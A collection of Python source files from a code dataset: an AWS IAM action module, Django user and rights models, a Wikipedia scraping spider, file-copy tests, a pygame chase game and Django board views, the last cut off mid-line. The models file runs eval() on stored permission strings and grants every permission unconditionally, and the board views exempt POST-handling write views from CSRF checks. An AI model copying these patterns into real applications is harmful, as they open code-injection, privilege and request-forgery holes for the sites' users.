+{"seq_id":"464884557","text":"# Copyright (c) 2012-2021, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom typing import Optional\n\nfrom .aws import Action as BaseAction\nfrom .aws import BaseARN\n\nservice_name = \"AWS Entity Resolution\"\nprefix = \"entityresolution\"\n\n\nclass Action(BaseAction):\n def __init__(self, action: Optional[str] = None) -> None:\n super().__init__(prefix, action)\n\n\nclass ARN(BaseARN):\n def __init__(self, resource: str = \"\", region: str = \"\", account: str = \"\") -> None:\n super().__init__(\n service=prefix, resource=resource, region=region, account=account\n )\n\n\nCreateMatchingWorkflow = Action(\"CreateMatchingWorkflow\")\nCreateSchemaMapping = Action(\"CreateSchemaMapping\")\nDeleteMatchingWorkflow = Action(\"DeleteMatchingWorkflow\")\nDeleteSchemaMapping = Action(\"DeleteSchemaMapping\")\nGetMatchId = Action(\"GetMatchId\")\nGetMatchingJob = Action(\"GetMatchingJob\")\nGetMatchingWorkflow = Action(\"GetMatchingWorkflow\")\nGetSchemaMapping = Action(\"GetSchemaMapping\")\nListMatchingJobs = Action(\"ListMatchingJobs\")\nListMatchingWorkflows = Action(\"ListMatchingWorkflows\")\nListSchemaMappings = Action(\"ListSchemaMappings\")\nListTagsForResource = Action(\"ListTagsForResource\")\nStartMatchingJob = Action(\"StartMatchingJob\")\nTagResource = Action(\"TagResource\")\nUntagResource = Action(\"UntagResource\")\nUpdateMatchingWorkflow = Action(\"UpdateMatchingWorkflow\")\n","sub_path":"awacs/entityresolution.py","file_name":"entityresolution.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"652058519","text":"# encoding=utf-8\nfrom django.db import models\nfrom django.contrib.auth.models import BaseUserManager, AbstractBaseUser\nimport datetime\nfrom core.tools import random_string\nfrom management.file_store import PersonalFile\n\nnow = datetime.datetime.now\n\n\ndef insert_user_in_system(user):\n user.company = Company.objects.get_or_create(owner=user)[0]\n user.rights = Rights.objects.get_or_create(owner=user)[0]\n user.save()\n\n\nclass UserManager(BaseUserManager):\n def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=UserManager.normalize_email(email))\n\n user.set_password(password)\n user.save(using=self._db)\n insert_user_in_system(user)\n return user\n\n def create_superuser(self, email, password):\n user = self.create_user(email,\n password=password)\n user.is_admin = True\n user.is_active = True\n user.superuser = True\n user.save(using=self._db)\n insert_user_in_asast(user)\n return user\n\n def __unicode__(self):\n return u'%s %s' % (self.username, self.phone)\n\n\nclass User(AbstractBaseUser):\n ONLINE = 'ON'\n OFFLINE = 'OFF'\n STATUS_CHOICES = (\n (ONLINE, 'on-line'),\n (OFFLINE, 'off-line')\n )\n email = models.EmailField(\n verbose_name='email',\n max_length=255,\n unique=True,\n db_index=True)\n balance = models.IntegerField(verbose_name=u'Баланс', default=0)\n status = models.CharField(max_length=9, choices=STATUS_CHOICES, default=ONLINE)\n ban = models.BooleanField(verbose_name=u'Бан', default=False)\n reg_on = models.BooleanField(verbose_name=u'Запрос на регистрацию', default=False)\n token = models.CharField(max_length=200, default='', blank=True)\n is_active = models.BooleanField(default=False)\n is_admin = models.BooleanField(default=False)\n objects = UserManager()\n avatar = models.ForeignKey(PersonalFile, verbose_name=u'Аватар', blank=True, null=True)\n last_name = models.CharField(verbose_name=u'Фамилия', max_length=255, blank=True, default='')\n first_name = models.CharField(verbose_name=u'Имя', max_length=255, blank=True, default='')\n patronymic = models.CharField(verbose_name=u'Отчество', max_length=255, blank=True, default='')\n date_joined = models.DateTimeField(default=now)\n company = models.ForeignKey('Company', verbose_name=u'Компания', blank=True, null=True)\n rights = models.ForeignKey('Rights', verbose_name=u'Права', blank=True, null=True)\n phone = models.CharField(verbose_name=u\"Телефон\", max_length=50, default='', blank=True)\n skype = models.CharField(max_length=300, blank=True, default='')\n icq = models.CharField(max_length=300, blank=True, default='')\n news = models.BooleanField(verbose_name=u'Подписка', default=False)\n change_date = models.DateTimeField(verbose_name=u'Дата изменения', default=datetime.datetime.now)\n\n USERNAME_FIELD = 'email'\n\n def get_full_name(self):\n return '%s %s' % (self.first_name, self.last_name,)\n\n def get_short_name(self):\n return '%s' % (self.email,)\n\n def __unicode__(self):\n contact_name = ''\n if self.last_name:\n contact_name += '%s ' % self.last_name\n\n if self.first_name:\n contact_name += '%s.' % self.first_name\n\n if self.patronymic:\n contact_name += '%s. ' % self.patronymic\n if not contact_name:\n contact_name = str(self.email)\n return contact_name\n\n def has_perm(self, perm, obj=None):\n return True\n\n def has_module_perms(self, app_label):\n return True\n\n @property\n def is_staff(self):\n return self.is_admin\n\n def save(self, *args, **kwargs):\n self.change_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n super(User, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = u'Пользователя'\n verbose_name_plural = u'Пользователи'\n\n\nclass Company(models.Model):\n name = models.CharField(verbose_name=u'Название компании', max_length=300,\n blank=True, default=u'Без названия')\n owner = models.ForeignKey(User, verbose_name=u'Организотор', related_name='company_owner', null=True, unique=True)\n logo = models.ForeignKey(PersonalFile, verbose_name=u'Логотип', blank=True, null=True)\n date = models.DateField(verbose_name=u'Дата регистрации', default=now, editable=False)\n change_date = models.DateTimeField(verbose_name=u'Дата изменения', default=datetime.datetime.now)\n\n def __unicode__(self):\n return u'%s' % self.name\n\n def save(self, *args, **kwargs):\n self.change_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n super(Company, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = u'Компания'\n verbose_name_plural = u'Компании'\n\n\nclass CompanyInvite(models.Model):\n user = models.ForeignKey(User, verbose_name=u'Приглашающий')\n email = models.CharField(verbose_name=u'Приглашенный', max_length=255)\n company = models.ForeignKey(Company, verbose_name=u'Компания')\n dialog = models.CharField(verbose_name=u'Диалог', max_length=255, blank=True)\n date = models.DateTimeField(verbose_name=u'Дата приглашения', blank=True)\n date_close = models.DateTimeField(verbose_name=u'Дата закрытия приглашения', blank=True, null=True)\n accept = models.BooleanField(verbose_name=u'Принято', default=False)\n cancel = models.BooleanField(verbose_name=u'Отклонено', default=False)\n\n def __unicode__(self):\n return u'%s %s %s %s' % (self.email, self.date, self.accept, self.cancel)\n\n class Meta:\n verbose_name = u'Приглашение в компанию'\n verbose_name_plural = u'Приглашения в компанию'\n\n\nclass Contact(models.Model):\n owner = models.ForeignKey(User, verbose_name=u'Организатор', related_name='facebook_owner', null=True)\n user = models.ForeignKey(User, verbose_name=u'Пользователь', related_name='user_in_row', blank=True, null=True)\n last_name = models.CharField(verbose_name=u'Фамилия', max_length=255, blank=True, default='')\n first_name = models.CharField(verbose_name=u'Имя', max_length=255, blank=True, default='')\n patronymic = models.CharField(verbose_name=u'Отчество', max_length=255, blank=True, default='')\n company = models.CharField(verbose_name=u'Компания', max_length=255, blank=True, default='')\n email = models.CharField(verbose_name=u'Email', blank=True, default='', max_length=255)\n phone = models.CharField(verbose_name=u\"Телефон\", max_length=50, default='', blank=True)\n description = models.TextField(verbose_name=u'Комментарий', blank=True, default='')\n change_date = models.DateTimeField(verbose_name=u'Дата изменения', default=datetime.datetime.now)\n\n def __unicode__(self):\n contact_name = ''\n if self.company:\n contact_name += '%s ' % self.company\n\n if self.last_name:\n contact_name += '%s ' % self.last_name\n\n if self.first_name:\n contact_name += '%s.' % self.first_name[0].upper()\n\n if self.patronymic:\n contact_name += '%s. ' % self.patronymic[0].upper()\n\n if self.phone:\n contact_name += '+7 %s ' % self.phone\n\n if self.email:\n contact_name += '%s' % self.email\n\n return contact_name\n\n def save(self, *args, **kwargs):\n self.change_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if self.user:\n if not self.last_name:\n self.last_name = self.user.last_name\n if not self.first_name:\n self.first_name = self.user.first_name\n if not self.patronymic:\n self.patronymic = self.user.patronymic\n if not self.company:\n self.company = self.user.company\n if not self.email:\n self.email = self.user.email\n if not self.phone:\n self.phone = self.user.phone\n super(Contact, self).save(*args, **kwargs)\n\n class Meta:\n verbose_name = u'Контакт'\n verbose_name_plural = u'Контакты'\n\n\nclass Session(models.Model):\n not_closed = models.BooleanField(verbose_name=u'Вечная сессия', default=False)\n close = models.BooleanField(verbose_name=u'Закрыта', default=False)\n user = models.ForeignKey(User, verbose_name=u'Пользователь')\n key = models.CharField(verbose_name=u'Ключь сессии', blank=True, default='', max_length=255)\n start = models.DateTimeField(verbose_name=u'Дата открытия', default=now)\n last_connection = models.DateTimeField(verbose_name=u'Дата последней активности', default=now)\n device = models.TextField(verbose_name=u'Информация об устройстве', blank=True)\n live_time = models.IntegerField(verbose_name=u'Время жизни ( минуты )', default=60)\n\n def save(self, *args, **kwargs):\n if not self.key:\n self.key = random_string(10)\n super(Session, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return u'%s %s %s' % (self.user, self.last_connection, self.live_time)\n\n class Meta:\n verbose_name = u'Сессия'\n verbose_name_plural = u'Сессии'\n\n\nclass Rights(models.Model):\n # 0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные\n COMPANY_RIGHTS = (\n ('0', u'Только я'),\n ('1', u'Компания ')\n )\n owner = models.ForeignKey(User, verbose_name=u'Владелец', unique=True, related_name='rights_owner')\n session_twins = models.BooleanField(verbose_name=u'Множимый профиль', default=True)\n profile_access = models.CharField(verbose_name=u'Доступ к профилю',\n max_length=255, default=\"[1, 2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n contact_access = models.CharField(verbose_name=u'Доступ в контактах',\n max_length=255, default=\"[1, 2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n message_access = models.CharField(verbose_name=u'Писать личные сообщения',\n max_length=255, default=\"[1, 2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n technique_access = models.CharField(verbose_name=u'Чтение информации о технике',\n max_length=255, default=\"[2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n driver_access = models.CharField(verbose_name=u'Чтение информации о водителях',\n max_length=255, default=\"[2, 3]\",\n help_text=u'0 - Только я, 1 - Компания, 2 - Контакты, 3 - Остальные')\n facebook_access = models.CharField(verbose_name=u'Доступ к списку контактов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n tracker_install = models.CharField(verbose_name=u'Установка трекера',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n report_order = models.CharField(verbose_name=u'Заказ отчетов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n edit_technique = models.CharField(verbose_name=u'Редактирование техники',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n edit_driver = models.CharField(verbose_name=u'Редактирование водителей',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n edit_order = models.CharField(verbose_name=u'Редактирование заказов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n del_technique = models.CharField(verbose_name=u'Удаление техники',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n del_driver = models.CharField(verbose_name=u'Удаление водителей',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n del_order = models.CharField(verbose_name=u'Удаление заказов',\n max_length=1, choices=COMPANY_RIGHTS, default=\"1\")\n invite_in_company = models.BooleanField(verbose_name=u'Приглашать в компанию', default=True)\n del_from_company = models.BooleanField(verbose_name=u'Удалять из компании', default=True)\n\n def __unicode__(self):\n return u'%s: %s' % (self.id, self.owner)\n\n def check_right_for_user(self, user, right):\n # Проверка доступа пользователю\n result = False\n if user == self.owner:\n result = True\n else:\n type_in = get_someone_for_user_type(user, self.owner)\n n = eval(str(self._meta._name_map[right][0].value_from_object(self)))\n if type(n) != list:\n accept_groups = [n]\n else:\n accept_groups = n\n for i in type_in:\n if i in accept_groups:\n result = True\n return result\n\n def get_rights_list(self, right):\n # Получение списка груп для права\n return eval(self._meta._name_map[right][0].value_from_object(self))\n\n class Meta:\n verbose_name = u'Право'\n verbose_name_plural = u'Права'\n\n\ndef get_someone_for_user_type(someone, user):\n # Получение типа прав пользователя\n result = []\n if user == someone:\n result.append(0)\n if user.company == someone.company:\n result.append(1)\n if Contact.objects.filter(owner=user, email=someone.email).exists():\n result.append(2)\n if someone.is_authenticated():\n result.append(3)\n return result\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"445977332","text":"\"\"\"Spider for scraping revisions via the Wikipedia API.\"\"\"\n\n# pylint: disable=R0913,R0201\n\n# Standard lib imports\nimport os\nimport json\nfrom collections import OrderedDict\n# Scrapy imports\nfrom scrapy import Spider, Request\n# ISS Wikipedia imports\nfrom src.utils import get_usernames\nfrom src.utils.web import add_urlparams\nfrom webscraping.items import WikiRevisionItem\n\nDIR_PATH = os.path.dirname(__file__)\nROOT_PATH = os.path.join(DIR_PATH, '..', '..')\nUSERS = get_usernames()\n\n\nclass WikiRevisions(Spider):\n \"\"\"Spider scraping revisions via the Wikipedia API.\"\"\"\n name = 'revisions'\n base_url = 'https://en.wikipedia.org/w/api.php'\n usernames = USERS\n\n pages = OrderedDict()\n\n # Settings\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'webscraping.pipelines.WikiRevisionsPipeline': 300\n }\n }\n\n # Methods -----------------------------------------------------------------\n\n def start_requests(self):\n \"\"\"Custom start method.\"\"\"\n for user in self.usernames:\n url = self.make_url(user)\n request = Request(url, callback=self.parse)\n request.meta['user_name'] = user\n yield request\n\n def parse(self, response):\n \"\"\"Spider parsing method.\"\"\"\n user = response.meta['user_name']\n data = json.loads(response.body_as_unicode())\n item = WikiRevisionItem(user_name=user, revisions=data)\n yield item\n\n # Look for continuation parameter\n if 'continue' in data:\n cont = data['continue']['arvcontinue']\n url = self.make_url(user, cont=cont)\n request = Request(url, callback=self.parse)\n request.meta['user_name'] = user\n yield request\n\n def make_url(self, user, props='ids|flags|timestamp|size|tags',\n limit=500, frm='json', cont=None, **kwargs):\n \"\"\"Make url for API request.\"\"\"\n params = {\n 'action': 'query',\n 'list': 'allrevisions',\n 'arvuser': user,\n 'arvlimit': limit,\n 'arvprop': props,\n 'format': frm,\n **kwargs\n }\n if cont:\n params.update(arvcontinue=cont)\n url = add_urlparams(self.base_url, params)\n return url\n","sub_path":"webscraping/spiders/revisions.py","file_name":"revisions.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"497247307","text":"import os\nimport shutil\nimport tempfile\nimport time\nfrom os import mkdir, getcwd\n\nfrom click.testing import CliRunner\nfrom watchdog import events\n\nfrom kudu.commands import link\n\n\ndef test_interface_path_converter():\n dst = os.path.join(tempfile.gettempdir(), str(time.time()))\n mkdir(dst)\n\n runner = CliRunner()\n with runner.isolated_filesystem():\n src = getcwd()\n\n mkdir('interface')\n open(os.path.join('interface', 'test.html'), 'wb').close()\n\n link.copyfiles(\n src, dst,\n link.InterfacePathConverter({'filename': 'interface_xy.zip'})\n )\n assert os.path.exists(os.path.join(dst, 'interface_xy', 'test.html'))\n\n shutil.rmtree(dst)\n\n\ndef test_presentation_path_converter():\n dst = os.path.join(tempfile.gettempdir(), str(time.time()))\n mkdir(dst)\n\n runner = CliRunner()\n with runner.isolated_filesystem():\n src = getcwd()\n\n open('index.html', 'wb').close()\n open('thumbnail.png', 'wb').close()\n mkdir('iPadOnly')\n open(os.path.join('iPadOnly', 'iPad.html'), 'wb').close()\n\n link.copyfiles(\n src, dst,\n link.PresentationPathConverter({'filename': '1234_4321.zip'})\n )\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', 'index.html')\n )\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', '1234_4321.png')\n )\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', 'iPad.html')\n )\n\n shutil.rmtree(dst)\n\n\ndef test_copy_files_event_handler():\n dst = os.path.join(tempfile.gettempdir(), str(time.time()))\n mkdir(dst)\n\n runner = CliRunner()\n with runner.isolated_filesystem():\n src = getcwd()\n converter = link.PresentationPathConverter({\n 'filename': '1234_4321.zip'\n })\n event_handler = link.CopyFilesEventHandler(src, dst, converter)\n\n class TestEvent(object):\n event_type = events.EVENT_TYPE_MODIFIED\n src_path = os.path.join(src, 'index.html')\n is_directory = False\n\n open('index.html', 'wb').close()\n event_handler.on_any_event(TestEvent)\n\n assert os.path.exists(\n os.path.join(dst, 'slides', '1234_4321', 'index.html')\n )\n\n shutil.rmtree(dst)\n","sub_path":"kudu/tests/test_link.py","file_name":"test_link.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"66470273","text":"import pygame\r\nimport random\r\n\r\nKEY_UP = 273\r\nKEY_DOWN = 274\r\nKEY_LEFT = 276\r\nKEY_RIGHT = 275\r\nKEY_ENTER = 13\r\nKEY_Q = 113\r\nplay_again = True\r\nlevel_counter = 1\r\n\r\n\r\ndef overlap(c1, c2):\r\n if (c2.x in xrange(c1.x,c1.x + c1.dimensions[2]) and c2.y in xrange(c1.y, c1.y + c1.dimensions[3])) or (c2.x + c2.dimensions[2] in xrange(c1.x,c1.x + c1.dimensions[2]) and c2.y + c2.dimensions[3] in xrange(c1.y, c1.y + c1.dimensions[3])):\r\n return True\r\n else:\r\n return False\r\n\r\nclass Character(object):\r\n def __init__(self,image,screen):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n\r\n def get_location(self):\r\n return (self.x,self.y)\r\n\r\nclass Enemy(Character):\r\n def __init__(self,image,screen,others):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n self.set_location(others)\r\n self.direction_speed = 1\r\n self.change_direction()\r\n\r\n def change_direction(self):\r\n self.x_speed = random.randint(-1,1)\r\n self.y_speed = random.randint(-1,1)\r\n self.x_speed *= self.direction_speed\r\n self.y_speed *= self.direction_speed\r\n\r\n def set_location(self,others):\r\n self.x = random.randint(self.bounds[0],self.bounds[2] - self.dimensions[2])\r\n self.y = random.randint(self.bounds[1],self.bounds[3] - self.dimensions[3])\r\n resetFlag = False\r\n for i in others:\r\n if overlap(i,self):\r\n resetFlag = True\r\n if resetFlag:\r\n self.set_location(others)\r\n\r\n def move(self):\r\n if self.x <= self.bounds[2] and self.y <= self.bounds[3] and self.x >= self.bounds[0] - self.dimensions[2] and self.y >= self.bounds[1] - self.dimensions[3]:\r\n self.x += self.x_speed\r\n self.y += self.y_speed\r\n elif self.x > self.bounds[2]:\r\n self.x = self.bounds[0] - self.dimensions[2]\r\n elif self.y > self.bounds[3]:\r\n self.y = self.bounds[1] - self.dimensions[3]\r\n elif self.x < self.bounds[0] - self.dimensions[2]:\r\n self.x = self.bounds[2]\r\n elif self.y < self.bounds[3] - self.dimensions[3]:\r\n self.y = self.bounds[3]\r\n\r\nclass Goblin(Enemy):\r\n def __init__(self,image,screen,others):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n self.set_location(others)\r\n self.direction_speed = 1\r\n self.change_direction()\r\n\r\nclass Hero(Character):\r\n def __init__(self,image,screen):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n for i in xrange(len(self.bounds)/2):\r\n self.bounds[i] += 32\r\n self.bounds[i+2] -= 32\r\n #self.bounds = list(self.bounds) + [32, 32, -32, -32]\r\n self.x = self.bounds[2]/2 - self.dimensions[2]/2\r\n self.y = self.bounds[3]/2 - self.dimensions[3]/2\r\n self.x_speed = 0\r\n self.y_speed = 0\r\n\r\n def set_speed(self, direction, speed):\r\n if direction == \"x\":\r\n self.x_speed = 2 * speed\r\n else:\r\n self.y_speed = 2 * speed\r\n\r\n def move(self):\r\n if self.x + self.dimensions[2] <= self.bounds[2] and self.y + self.dimensions[3] <= self.bounds[3] and self.x >= self.bounds[0] and self.y >= self.bounds[1]:\r\n self.x += self.x_speed\r\n self.y += self.y_speed\r\n elif self.x + self.dimensions[2] > self.bounds[2]:\r\n self.x = self.bounds[2] - self.dimensions[2]\r\n elif self.y + self.dimensions[3] > self.bounds[3]:\r\n self.y = self.bounds[3] - self.dimensions[3]\r\n elif self.x < self.bounds[0]:\r\n self.x = self.bounds[0]\r\n elif self.y < self.bounds[1]:\r\n self.y = self.bounds[1]\r\n\r\nclass Monster(Enemy):\r\n def __init__(self,image,screen,others):\r\n self.image = image\r\n self.dimensions = image.get_rect()\r\n self.bounds = screen.get_rect()\r\n self.set_location(others)\r\n self.direction_speed = 3\r\n self.change_direction()\r\n\r\n\r\n\r\n\r\ndef main():\r\n global play_again, level_counter\r\n play_again = False\r\n # declare the size of the canvas\r\n background_image = pygame.image.load('images/background.png')\r\n\r\n x,y,width,height = background_image.get_rect()\r\n blue_color = (97, 159, 182)\r\n\r\n pygame.init()\r\n screen = pygame.display.set_mode((width, height))\r\n pygame.display.set_caption('Simple Example')\r\n clock = pygame.time.Clock()\r\n tick = clock.tick()\r\n game_music = pygame.mixer.Sound('sounds/music.wav')\r\n\r\n characters = []\r\n\r\n # Game initialization\r\n hero_image = pygame.image.load('images/hero.png').convert_alpha()\r\n hero = Hero(hero_image,screen)\r\n characters.append(hero)\r\n\r\n monster_image = pygame.image.load('images/monster.png').convert_alpha()\r\n monster = Monster(monster_image,screen,characters)\r\n characters.append(monster)\r\n\r\n num_goblins = 3 + level_counter - 1\r\n goblins = []\r\n goblin_image = pygame.image.load('images/goblin.png').convert_alpha()\r\n for i in xrange(num_goblins):\r\n goblin = Goblin(goblin_image,screen,characters)\r\n characters.append(goblin)\r\n goblins.append(goblin)\r\n\r\n\r\n stop_game = False\r\n quit_game = False\r\n end_condition = ''\r\n game_music.play(-1)\r\n font = pygame.font.Font(None, 30)\r\n level_text = font.render('Level %d' % level_counter, True, (0, 0, 0), (255,255,255))\r\n\r\n while not stop_game:\r\n for event in pygame.event.get():\r\n # Event handling\r\n if event.type == pygame.QUIT:\r\n stop_game = True\r\n quit_game = True\r\n if event.type == pygame.KEYDOWN:\r\n # activate the cooresponding speeds\r\n # when an arrow key is pressed down\r\n if event.key == KEY_DOWN:\r\n hero.set_speed(\"y\",1)\r\n elif event.key == KEY_UP:\r\n hero.set_speed(\"y\",-1)\r\n elif event.key == KEY_LEFT:\r\n hero.set_speed(\"x\",-1)\r\n elif event.key == KEY_RIGHT:\r\n hero.set_speed(\"x\",1)\r\n\r\n if event.type == pygame.KEYUP:\r\n # deactivate the cooresponding speeds\r\n # when an arrow key is released\r\n if event.key == KEY_DOWN:\r\n hero.set_speed(\"y\",0)\r\n elif event.key == KEY_UP:\r\n hero.set_speed(\"y\",0)\r\n elif event.key == KEY_LEFT:\r\n hero.set_speed(\"x\",0)\r\n elif event.key == KEY_RIGHT:\r\n hero.set_speed(\"x\",0)\r\n\r\n if overlap(hero, monster):\r\n stop_game = True\r\n sound = pygame.mixer.Sound('sounds/win.wav')\r\n sound.play()\r\n end_condition = 'win'\r\n\r\n for i in goblins:\r\n if overlap(hero, i):\r\n stop_game = True\r\n sound = pygame.mixer.Sound('sounds/lose.wav')\r\n sound.play()\r\n end_condition = 'lose'\r\n\r\n hero.move()\r\n monster.move()\r\n for i in goblins:\r\n i.move()\r\n\r\n if tick > 2000:\r\n monster.change_direction()\r\n for i in goblins:\r\n i.change_direction()\r\n tick = 0\r\n\r\n # Draw background\r\n screen.blit(background_image, (0,0))\r\n\r\n # Game display\r\n screen.blit(level_text,(32,32))\r\n screen.blit(hero.image, hero.get_location())\r\n screen.blit(monster.image, monster.get_location())\r\n for i in goblins:\r\n screen.blit(i.image, i.get_location())\r\n\r\n\r\n pygame.display.update()\r\n\r\n tick += clock.tick()\r\n\r\n\r\n game_music.stop()\r\n if end_condition == 'win':\r\n level_counter += 1\r\n else:\r\n level_counter = 1\r\n\r\n while not quit_game:\r\n for event in pygame.event.get():\r\n # Event handling\r\n if event.type == pygame.QUIT:\r\n quit_game = True\r\n if event.type == pygame.KEYDOWN:\r\n # activate the cooresponding speeds\r\n # when an arrow key is pressed down\r\n if event.key == KEY_ENTER:\r\n play_again = True\r\n quit_game = True\r\n if event.key == KEY_Q:\r\n quit_game = True\r\n\r\n\r\n screen.blit(background_image, (0,0))\r\n screen.blit(hero.image, hero.get_location())\r\n font = pygame.font.Font(None, 50)\r\n text = font.render('press ENTER to play again', True, (0, 0, 0))\r\n text2 = font.render('press Q to quit ', True, (0, 0, 0))\r\n if end_condition == 'win':\r\n text3 = font.render('You win!', True, (0, 0, 0))\r\n else:\r\n text3 = font.render('You lose!', True, (0, 0, 0))\r\n screen.blit(text, (32, height/2))\r\n screen.blit(text2, (32, height/2 + 75))\r\n screen.blit(text3, (32, height/2 - 75))\r\n pygame.display.update()\r\n\r\n pygame.quit()\r\n\r\nif __name__ == '__main__':\r\n while play_again:\r\n main()\r\n","sub_path":"catch_the_monster.py","file_name":"catch_the_monster.py","file_ext":"py","file_size_in_byte":9244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"91499868","text":"from django.shortcuts import render\nfrom django.http.response import HttpResponse, HttpResponseRedirect\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom django.contrib.auth.models import User\nfrom board.models import Recruit, Apply, Collected\nfrom ad.models import Ads\nfrom board.forms import RecruitWriteForm, ApplyWriteForm\n\n\ndef index(request):\n\tcontext = {}\n\treturn render(request, 'index.html', context)\n\ndef naver_search(request):\n\treturn render(request, 'naver_search.html', {})\n\ndef make_page_range(current,total_page):\n\trange_index=divmod(current-1,10)[0]\n\tpage_range = range((range_index)*10+1, (range_index+1)*10+1)\n\tpage_previous = range_index*10\n\tpage_next = (range_index+1)*10+1\n\tif((range_index+1)*10>total_page):\n\t\tpage_range = range((range_index)*10+1,total_page)\n\t\tpage_next = 0\n\tif(range_index == 0):\n\t\tpage_previous = 0\n\treturn [page_range,page_previous,page_next]\n\ndef recruit(request):\n\tposts = Recruit.objects.all()\n\t#페이지 확인\t\n\tpage_data = Paginator(Recruit.objects.all().order_by('-id'),20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tposts = page_data.page(page)\n\texcept PageNotAnInteger:\n\t\tposts = page_data.page(1)\n\t\tpage = 1\n\texcept EmptyPage:\n\t\tposts = page_data.page(page_data.num_pages)\n\t#페이지네이션\n\tpage = int(page)\n\tmake_page_range_result = make_page_range(page,page_data.num_pages+1)\n\tboard_range = make_page_range_result[0]\n\tpage_previous = make_page_range_result[1]\n\tpage_next = make_page_range_result[2]\n\tcontext={\n\t\t'posts':posts,\n\t\t'page_previous':page_previous,\n\t\t'page':page,\n\t\t'page_next':page_next,\n\t\t'board_range':board_range}\n\treturn render(request, 'board/recruit.html', context)\n\ndef recruit_post_read(request):\n\trecruit_post_id = request.GET.get('recruit_post_id')\n\tif recruit_post_id:\n\t\tpost = Recruit.objects.get(id = recruit_post_id)\n\t\tcontext={'post':post}\n\t\treturn render(request,'board/recruit_post_read.html', context)\n\telse:\n\t\treturn HttpResponseRedirect('/board/recruit')\n\n@csrf_exempt\ndef recruit_post_write(request):\n\tif request.method == 'POST':\n\t\tform = RecruitWriteForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnew = Recruit(title=form.cleaned_data['title'], content=form.cleaned_data['content'], author=request.user)\n\t\t\tnew.save()\n\t\t\tpost = Recruit.objects.get(id = new.id)\n\t\t\tcontext={'post':post}\n\t\t\treturn render(request,'board/recruit_post_read.html', context)\n\telse:\n\t\ttemplate = get_template('board/recruit_post_write.html')\n\t\tform = RecruitWriteForm()\n\t\tcontext={'form':form}\n\t\treturn render(request,'board/recruit_post_write.html', context)\n\ndef apply(request):\n\tposts = Apply.objects.all()\n\t#페이지 확인\t\n\tpage_data = Paginator(Apply.objects.all().order_by('-id'),20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tposts = page_data.page(page)\n\texcept PageNotAnInteger:\n\t\tposts = page_data.page(1)\n\t\tpage = 1\n\texcept EmptyPage:\n\t\tposts = page_data.page(page_data.num_pages)\n\t#페이지네이션\n\tpage = int(page)\n\tmake_page_range_result = make_page_range(page,page_data.num_pages+1)\n\tboard_range = make_page_range_result[0]\n\tpage_previous = make_page_range_result[1]\n\tpage_next = make_page_range_result[2]\n\tcontext={\n\t\t'posts':posts,\n\t\t'page_previous':page_previous,\n\t\t'page':page,\n\t\t'page_next':page_next,\n\t\t'board_range':board_range}\n\treturn render(request, 'board/apply.html', context)\n\ndef apply_post_read(request):\n\tapply_post_id = request.GET.get('apply_post_id')\n\tif apply_post_id:\n\t\tpost = Apply.objects.get(id = apply_post_id)\n\t\tcontext={'post':post}\n\t\treturn render(request, 'board/apply_post_read.html', context)\n\telse:\n\t\treturn HttpResponseRedirect('/board/apply')\n\n@csrf_exempt\ndef apply_post_write(request):\n\tif request.method == 'POST':\n\t\tform = ApplyWriteForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnew = Apply(title=form.cleaned_data['title'], content=form.cleaned_data['content'], author=request.user)\n\t\t\tnew.save()\n\t\t\tpost = Apply.objects.get(id = new.id)\n\t\t\tcontext={'post':post}\n\t\t\treturn render(request, 'board/apply_post_read.html', context)\n\telse:\n\t\ttemplate = get_template('board/apply_post_write.html')\n\t\tform = 